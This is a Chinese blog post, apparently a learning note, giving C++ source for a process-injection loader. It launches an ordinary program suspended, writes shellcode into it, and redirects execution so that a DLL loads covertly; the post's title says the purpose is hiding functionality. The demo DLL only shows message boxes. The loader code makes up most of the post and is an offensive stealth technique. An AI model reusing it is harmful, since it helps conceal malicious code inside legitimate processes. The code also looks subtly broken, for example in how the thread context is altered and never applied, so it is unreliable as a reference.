EXE1调用EXE2来加载DLL实现隐藏功能
2014-02-25 22:23
435 查看
这种方法不易察觉,其实还能做出很多其他的类型,这里只是学习··································
自己修改了下结构········································
主CPP ExeOfShellcodeDllInject 代码:
将 OrdinaryMsg.exe shellcodeDLLInject.dll 和主EXE放在同一目录下可以运行成功
OrdinaryMsg.exe 代码:
最后效果为;
Context.Eip = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction); 改为 Context.Eax = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction); 线程在ring3的第一行代码时,Eax存放的是线程函数起始地址 这个应该更稳妥的,主线程暂停在ntdll空间,由ntdll->EXE入口点 中间还干了事,学习于 http://bbs.pediy.com/showthread.php?t=159536
自己修改了下结构········································
主CPP ExeOfShellcodeDllInject 代码:
#include "stdafx.h" #include <Windows.h> typedef struct tempData { char szInjectDllPath[MAX_PATH]; char szShllcode[MAX_PATH]; }; char ShellCode[] = {0x60,0x68,0x78,0x56,0x34,0x12,0xB8,0x78,0x56,0x34,0x12,0xFF,0xD0,0x61,0xE9,0x78,0x56,0x34,0x12}; //pushad //push 0x12345678 //mov eax,0x12345678 //call eax //popad //jmp 0xXXXXXXXX struct tempData g_data = {0x0}; int _tmain(int argc, _TCHAR* argv[]) { //初始化结构体中的两个结构 DLL路径+shellcode strcpy(g_data.szInjectDllPath,"shellcodeDLLInject.dll"); strcpy(g_data.szShllcode,ShellCode); char szExePath[] = "OrdinaryMsg.exe"; //PathRemoveFileSpec(szExePath); STARTUPINFO si = {sizeof(si)}; PROCESS_INFORMATION pi = {0}; CONTEXT context; //生成暂停EXE去做事情 if (!CreateProcess(szExePath,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi)) { printf("找不到exe\n"); return 0; } //设置 CONTEXT_INTEGER 才能得到寄存器值 context.ContextFlags = CONTEXT_INTEGER; GetThreadContext(pi.hThread,&context); LPVOID lpData = VirtualAllocEx(pi.hProcess,NULL,sizeof(g_data)+1,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE); if (lpData == NULL) { printf("申请内存失败!\n"); return 0; } *(DWORD*)(g_data.szShllcode+0x2) = (DWORD)lpData; *(DWORD*)(g_data.szShllcode + 0x7) = (DWORD)LoadLibraryA; *(DWORD*)(g_data.szShllcode + 15) = (DWORD)(context.Eax - (DWORD)((char*)lpData + sizeof(MAX_PATH)+ 14) -5 ); //这里面的14为 g_data.szShllcode 起始到最后一个需要修改处的长度 if (!WriteProcessMemory(pi.hProcess,lpData,&g_data,sizeof(g_data),NULL)) { printf("写入内存失败!\n"); return 0; } context.Eax = (DWORD)(((tempData*)lpData)->szShllcode); ResumeThread(pi.hThread); return 0; }
将 OrdinaryMsg.exe shellcodeDLLInject.dll 和主EXE放在同一目录下可以运行成功
OrdinaryMsg.exe 代码:
#include "stdafx.h" #include <Windows.h> #pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" ) int main(int argc, _TCHAR* argv[]) { //FreeConsole(); MessageBox(NULL,"OrdinaryMsg","OrdinaryMsg",MB_OK); //AllocConsole(); return 0; }shellcodeDLLInject.dll 代码:
#include "stdafx.h" BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: DisableThreadLibraryCalls(hModule); MessageBox(NULL,TEXT("DLL中非法操作"),TEXT("DLL中非法操作"),MB_OK); break; case DLL_PROCESS_DETACH: MessageBox(NULL,TEXT("DLL中非法操作完毕"),TEXT("DLL中非法操作完毕"),MB_OK); break; } return TRUE; }
最后效果为;
相关文章推荐
- Android JNI知识简介
- LXC安装和配置(源码安装)
- firefox插件开发
- 父节点获取子节点的字符串
- 父节点获取子节点的字符串
- JAVA面试题
- 黑马程序员-----java集合类
- Struts2复习之OGNL(2)
- os模块
- 如何在DataTable中查找数据 Dataview检索数据
- [转载] 虚拟化管理软件比较
- fstab文件中挂载/dev/mtdblock设备不行!
- linux中select()函数分析
- JavaEE项目切换到Intellij遇到的一个问题
- J2EE的13种核心技术
- webkit在vs2008中编译
- Java中字符串相等与大小比较
- JSP内置对象
- Java中字符串相等与大小比较
- Docker简要操作